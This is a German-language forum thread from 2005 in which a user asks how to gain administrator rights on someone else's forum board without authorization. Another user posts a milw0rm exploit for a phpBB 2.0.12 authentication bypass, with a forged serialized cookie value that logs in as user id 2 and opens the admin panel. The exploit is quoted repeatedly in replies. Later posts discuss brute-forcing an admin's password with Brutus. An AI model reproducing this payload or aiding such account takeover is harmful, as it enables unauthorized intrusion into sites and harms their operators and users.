Mitgleid Admin rechte geben!

themark · 16. April 2005

hallO!
kann manm in eienm forum z.b wenn ich mcih anem,dle irgendwie so machen dass ich admin bekomem autoamtisch ?

ich habe einen typen kenenn gelertn der kann sowas sagt es aber ned weida

lg themark

Anzeige

Sytec · 16. April 2005

RE: Für diesen Beitrag bedanken sich folgende User:

Wenn du deine Frage nochmal auf Deutsch stellen würdest,
würden die Chancen um 100% steigen dass du eine Antwort kriegst.

Mal versuchen, da was zu verstehen (hab heute meinen Sozialtag^^):
Du willst automatisch in einem Board Admin sein oder wie?
Als normaler User?

themark · 16. April 2005

ja genau
also ich kenn wen der es kann verrat es aber ned irgendwie macht er was mit berutus oder sowas das er dann normal user auf admin sein kann^^

vielleicht macht er es nicht mit brutus

Noodles · 16. April 2005

Du meinst Bruteforcen? Zum Beispiel das PW von einem Admin? Na dann viel Glück und Spaß...
Achja..wenn du es wirklich versuchen möchtest, kannst du dich darauf einstellen den PC nen paar Wochen laufen zu lassen ^^

themark · 16. April 2005

hmm aber der hat es ned mit brute force gemacht

es ging in 5 minuten .....

naja er hat sich angemedet und gleich war er admin keine ahung wie er das gmacth hast so schnell

er sagt es mir jha ned

rubenwurst · 17. April 2005

phpBB 2.0.12 Session Handling Authentication Bypass ..

easy to use exploit ..

** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..

1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made

3- Close the Browser ..

2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example

and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor

3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//

save the cookies.txt..

4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !!

complete the mission by clicking " Go to Administration Panel "

--------------------------------------------------------------------------------

written by : Ali7
e-mail : ali7@hotmail.co.uk

# milw0rm.com [2005-03-11]

Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Mehr gibts nicht zu sagen.

hacker5 · 17. April 2005

Original von xXMiTzEXx

phpBB 2.0.12 Session Handling Authentication Bypass ..

easy to use exploit ..

** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..

1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made

3- Close the Browser ..

2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example

and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor

3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//

save the cookies.txt..

4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !!

complete the mission by clicking " Go to Administration Panel "

--------------------------------------------------------------------------------

written by : Ali7
e-mail : ali7@hotmail.co.uk

# milw0rm.com [2005-03-11]

Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Mehr gibts nicht zu sagen.

Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

rofl wie geil ist das denn ? aber wenn er htaccess schutz im acp hat würde denken das es nicht geht ^^

The_Gangsta · 17. April 2005

Original von xXMiTzEXx

phpBB 2.0.12 Session Handling Authentication Bypass ..

easy to use exploit ..

** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..

1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made

3- Close the Browser ..

2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example

and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor

3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//

save the cookies.txt..

4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !!

complete the mission by clicking " Go to Administration Panel "

--------------------------------------------------------------------------------

written by : Ali7
e-mail : ali7@hotmail.co.uk

# milw0rm.com [2005-03-11]

Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Mehr gibts nicht zu sagen.

Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

ähm ne frage wo ist bei mir der ordner application data???

rubenwurst · 17. April 2005

Original von The_Gangsta

Original von xXMiTzEXx

phpBB 2.0.12 Session Handling Authentication Bypass ..

easy to use exploit ..

** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..

1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made

3- Close the Browser ..

2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example

and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor

3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//

save the cookies.txt..

4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !!

complete the mission by clicking " Go to Administration Panel "

--------------------------------------------------------------------------------

written by : Ali7
e-mail : ali7@hotmail.co.uk

# milw0rm.com [2005-03-11]

Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Mehr gibts nicht zu sagen.

Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

ähm ne frage wo ist bei mir der ordner application data???

Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Wenn du da nicht selber drauf kommst...ein kleiner tipp..die benutzen villeicht die englishe version von firefox bzw os.

klar kann man schlimmere eingriffe durch ne .htacess schützen aber eben nicht alles.

The_Gangsta · 17. April 2005

boah was bedeutet application data übersetzt?

Sytec · 17. April 2005

Looooolll....ein paar Englisch-Kenntnisse würden aber echt nicht schaden...
sorry aber is so :O

P.S.: Anwendungsdaten

The_Gangsta · 17. April 2005

habe in english eine 2

und gibts das nicht für wbb board weil das ist für phpbb habe ich gerade gemerkt!

oculus · 17. April 2005

da hier so viele kiddis rumlaufen vermute ich mal das du in der sechsten klasse bist

The_Gangsta · 17. April 2005

ne 8. -.-

themark · 17. April 2005

also der kumpel kann es im woltlab forum lite kann das auch wer ?

kann man vielleicht mit burtus bei inem wolltab forum lite board mich admin rechte geben ???

hacker5 · 17. April 2005

1. schreib echt mal bitte mehr in die richtung deutsch
2. klar fragt sich nur wie lang du zeit hast 2-3 monate weil bruts ist bruteforce und dler geht ales durch bis er das passwort passend gefunden hat .

und ein exploit fürs wbb gibt es nicht soweit ich weiß

themark · 17. April 2005

hallo
exploit <> was ist das ?

ähm,naja das paasswort herausfinden will ich jha ned

ondern ein user admin rechte geben ob das geht ??
mit brutus!!

Gibt es ein schnelleres Programm wie Brutus so ähnlich ?

hacker5 · 17. April 2005

exploit <> was ist das ?

guck mal bei xXMiTzEXx post was sie da gepostet hat ist ein exploit

und ne andere möglichkeit halt pw des admins rausfinden ins acp gehen dir den rang admin geben

themark · 17. April 2005

hm,ja also kann man mit brutus ein user/mitgliedadmin rechte geben ?

oder gibt es andere programme die das können?

Gibt es programme die shcneller sind als brutus ?

udn wie kann man also ein paswort von einem ebnstimmten user im forum herausfinden da würe ich mirch freuen wenn mir es wer erklärt der jenige bekomt dnn 2x mal 10er bewertung

hacker5 · 17. April 2005

1. es geht nur einmal ne 10ner
2. schreib mal was langsamer und/oder kontrollier mal bitte immer was du schreibst
3. es gibt nur brute force dass, das passwort von einem admin/user/ knacken kann weißt du den username dauert es nicht mehr so lange hat das forum aber im acp nochmal ein passwort schutz wird es noch schwieriger und doppelt so lange dauern.

dazu gibt es aber ein tut

tut

themark · 17. April 2005

HallO!
Ja okay
Werde ich machen

Also ich weiß den Username und ACP kann man sich einloggen mit dem gleichen Passwort was der User vom Forum hat!

Kannst du mir das erklären ?

ja also mit dem tut geht es nciht
weil wenn ich es mit dem tut mache,,,,
ich gebe alles richtig ein aber der überprüft ned mdie ganzen zahlen also er ist in eienr sekunde bei mir fertig und zeigt mal kein passwort an und dann 1 und nochmals 1...

themark · 18. April 2005

jetzt antwrortet nmiemand mehr ?? (((

3psil0n · 19. April 2005

hmmm

du kommst mir komisch vor..

weil einmal hat doch einer mit dem namen MARK

sich als "german szene admin" beweorebn und crack beleidigt usw..

und dein name naja theMARK??

weis ja net ob des zusammenhängt aba kommzt mir komisch vor..weil du könntest ja mark sein und willst hier im board admin recht..ist nur spekulation

können das die admins irgendwie prüfen

hacker5 · 19. April 2005

aso ist das ^^ na dann wüssten wir wieso er admin rechte in einem wbb will

themark · 19. April 2005

wer ist mark wasn los ? ich bin dned der mark sondern themark ghmm

Nützliche Suchen

Mitgleid Admin rechte geben!

Videos zum Themenbereich